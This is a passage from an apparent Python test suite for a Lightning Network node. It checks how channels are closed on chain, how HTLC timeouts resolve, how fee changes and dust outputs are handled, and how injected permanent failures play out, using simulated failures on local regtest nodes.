l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin,
"allow_warning": True},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# listfunds will show 1 output change, and channels.
assert len([o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]) == 1
l1.stop()
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(100)
l1.start()
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
assert all(['address' in o for o in l1.rpc.listfunds()['outputs']])
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[
{
'may_reconnect': True,
'allow_warning': True,
}, {
'may_reconnect': True,
'disconnect': disconnects,
}
])
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None,
'plugin': coin_mvt_plugin},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 11000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(121)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(121)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)
h = inv['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects,
feerates=(7500, 7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('Handed peer, entering loop')
l2.fundchannel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(100)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
